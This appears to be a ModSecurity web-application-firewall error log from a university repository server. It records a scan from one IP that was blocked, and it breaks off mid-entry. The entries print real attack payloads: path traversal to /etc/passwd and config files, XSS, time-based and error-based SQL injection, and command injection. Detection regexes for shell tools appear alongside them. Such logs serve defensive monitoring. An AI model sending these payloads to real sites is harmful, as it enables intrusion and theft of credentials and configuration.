[tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAcoNk4AAAAF"]
[Tue Aug 29 11:42:52.367630 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAeZ55EAAAAN"]
[Tue Aug 29 11:42:53.377181 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAdTBCQAAAAY"]
[Tue Aug 29 11:42:53.423802 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAeZ55QAAAAN"]
[Tue Aug 29 11:42:54.387400 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAeB1pkAAAAv"]
[Tue Aug 29 11:42:54.533099 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdUc3wAAAAZ"]
[Tue Aug 29 11:42:57.435954 2023] [:error] [pid 1898] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAdqbF0AAAAR"]
[Tue Aug 29 11:42:59.696482 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdOeT0AAAAS"]
[Tue Aug 29 11:43:00.403607 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAc@ca0AAAAL"]
[Tue Aug 29 11:43:00.426747 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAbo-fsAAAAi"]
[Tue Aug 29 11:43:00.428524 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAc921MAAAAD"]
[Tue Aug 29 11:43:03.400429 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeZ56UAAAAN"]
[Tue Aug 29 11:43:03.400629 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeYbzQAAAAB"]
[Tue Aug 29 11:43:04.416176 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmkAAAAF"]
[Tue Aug 29 11:43:04.423315 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdTBDkAAAAY"]
[Tue Aug 29 11:43:06.494151 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAdb7nsAAAAb"]
[Tue Aug 29 11:43:07.531069 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAeChacAAAAw"]
[Tue Aug 29 11:43:08.586632 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAeYb0gAAAAB"]
[Tue Aug 29 11:43:08.586834 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAActbN4AAAAH"]
[Tue Aug 29 11:43:09.376971 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAdQ3kcAAAAV"]
[Tue Aug 29 11:43:10.379531 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAbo-gkAAAAi"]
[Tue Aug 29 11:43:11.410591 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAdQ3kwAAAAV"]
[Tue Aug 29 11:43:14.483231 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdSZRwAAAAX"]
[Tue Aug 29 11:43:15.464504 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdQ3l8AAAAV"]
[Tue Aug 29 11:43:18.411528 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAd9UPsAAAAr"]
[Tue Aug 29 11:43:18.443463 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdftX4AAAAG"]
[Tue Aug 29 11:43:20.456042 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdb7pMAAAAb"]
[Tue Aug 29 11:43:21.543269 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdSZTIAAAAX"]
[Tue Aug 29 11:43:21.559652 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdeQ3sAAAAQ"]
[Tue Aug 29 11:43:22.509731 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAXNubIAAAAg"]
[Tue Aug 29 11:43:23.403109 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAexIBkAAAAN"]
[Tue Aug 29 11:43:27.655928 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAARpg8AAAAAU"]
[Tue Aug 29 11:43:28.612320 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAfBLyEAAAAI"]
[Tue Aug 29 11:43:29.485526 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id 